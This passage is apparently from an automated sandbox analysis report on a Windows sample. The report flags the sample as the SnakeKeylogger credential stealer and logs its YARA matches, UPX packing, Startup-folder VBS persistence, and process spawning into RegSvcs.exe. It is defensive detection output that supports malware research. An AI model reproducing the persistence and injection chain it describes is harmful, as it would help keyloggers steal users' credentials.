              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_00412216
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0042435D
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_004033C0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0044F430
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_004125E8
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0044663B
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_00413801
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0042096F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_004129D0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_004119E3
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0041C9AE
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0047EA6F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0040FA10
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0044EB5F
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_00423C81
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_00411E78
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_00442E0C
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_00420EC0
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0044CF17
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_00444FD2
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_03EDEE00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00E1C146
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00E1D278
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00E15370
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00E1C468
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00E1C738
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00E169A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00E1E988
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E13AA16_2_00E13AA1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E1CA086_2_00E1CA08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E1CCD86_2_00E1CCD8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E19DE06_2_00E19DE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E13E096_2_00E13E09
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E16FC86_2_00E16FC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E1CFA96_2_00E1CFA9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E1F6316_2_00E1F631
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E1E97B6_2_00E1E97B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E1FA886_2_00E1FA88
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_06521E806_2_06521E80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_065217A06_2_065217A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_06529C706_2_06529C70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_065295486_2_06529548
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_06520B306_2_06520B30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_065250286_2_06525028
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_065229686_2_06522968
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_06521E706_2_06521E70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652DE006_2_0652DE00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652E6B06_2_0652E6B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652E6A06_2_0652E6A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652E6AF6_2_0652E6AF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652EF516_2_0652EF51
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652EF606_2_0652EF60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652178F6_2_0652178F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_06529C4F6_2_06529C4F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652CCA06_2_0652CCA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652D5506_2_0652D550
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652D5406_2_0652D540
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652DDFE6_2_0652DDFE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652E2586_2_0652E258
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652E24A6_2_0652E24A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652EAF86_2_0652EAF8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652EB086_2_0652EB08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_06520B206_2_06520B20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652F3B86_2_0652F3B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_06528BA06_2_06528BA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_065200406_2_06520040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652F8106_2_0652F810
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_065250186_2_06525018
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652F8026_2_0652F802
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_065200066_2_06520006
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652003F6_2_0652003F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652D0F86_2_0652D0F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652D9996_2_0652D999
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0652D9A86_2_0652D9A8
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: String function: 0040E710 appears 44 times
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: String function: 00401B10 appears 50 times
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: String function: 00408F40 appears 38 times
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: String function: 004301F8 appears 36 times
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: String function: 004115D7 appears 72 times
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: String function: 00416C70 appears 78 times
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: String function: 004181F2 appears 42 times
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: String function: 00445AE0 appears 130 times
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: String function: 0041341F appears 36 times
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: String function: 00422240 appears 38 times
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: String function: 004115D7 appears 36 times
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: String function: 00416C70 appears 39 times
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: String function: 00445AE0 appears 65 times
Source: mKRflLn5sx.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.Glagolitic.exe.3830000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.Glagolitic.exe.3c20000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000006.00000002.3307267063.0000000000424000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000002.00000002.876716377.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000002.989629914.0000000003830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: Glagolitic.exe PID: 5960, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Glagolitic.exe PID: 5168, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 5944, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: mKRflLn5sx.exe | Static PE information: Section: UPX1 ZLIB complexity 0.9920951973062382
Source: Glagolitic.exe.0.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9920951973062382
Source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, -----.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, -----.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, -----.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, -----.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.Glagolitic.exe.3c20000.1.raw.unpack, --.cs | Base64 encoded string: 'uPQp7iTDz1NKF5wIsee6Rh0uEunltU+19Xc2TNkI19hWAQqMxqp3fIC4uDdDJmmU'
Source: 5.2.Glagolitic.exe.3830000.1.raw.unpack, --.cs | Base64 encoded string: 'uPQp7iTDz1NKF5wIsee6Rh0uEunltU+19Xc2TNkI19hWAQqMxqp3fIC4uDdDJmmU'
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@10/3@4/4
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0044AF6C GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | File created: C:\Users\user\AppData\Local\croc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | File created: C:\Users\user\AppData\Local\Temp\tilths
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbs"
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RegSvcs.exe, 00000003.00000002.3309658145.000000000350D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.00000000034CE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.0000000003501000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3309658145.00000000034DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002D3F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002D73000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.3309591385.0000000002D7F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: mKRflLn5sx.exe | Virustotal: Detection: 63%
Source: mKRflLn5sx.exe | ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | File read: C:\Users\user\Desktop\mKRflLn5sx.exe
Source: unknown | Process created: C:\Users\user\Desktop\mKRflLn5sx.exe "C:\Users\user\Desktop\mKRflLn5sx.exe"
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Process created: C:\Users\user\AppData\Local\croc\Glagolitic.exe "C:\Users\user\Desktop\mKRflLn5sx.exe"
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\mKRflLn5sx.exe"
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\croc\Glagolitic.exe "C:\Users\user\AppData\Local\croc\Glagolitic.exe"
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\croc\Glagolitic.exe"
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Process created: C:\Users\user\AppData\Local\croc\Glagolitic.exe "C:\Users\user\Desktop\mKRflLn5sx.exe"
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\mKRflLn5sx.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\croc\Glagolitic.exe "C:\Users\user\AppData\Local\croc\Glagolitic.exe"
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\croc\Glagolitic.exe"
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Section loaded: wldp.dll
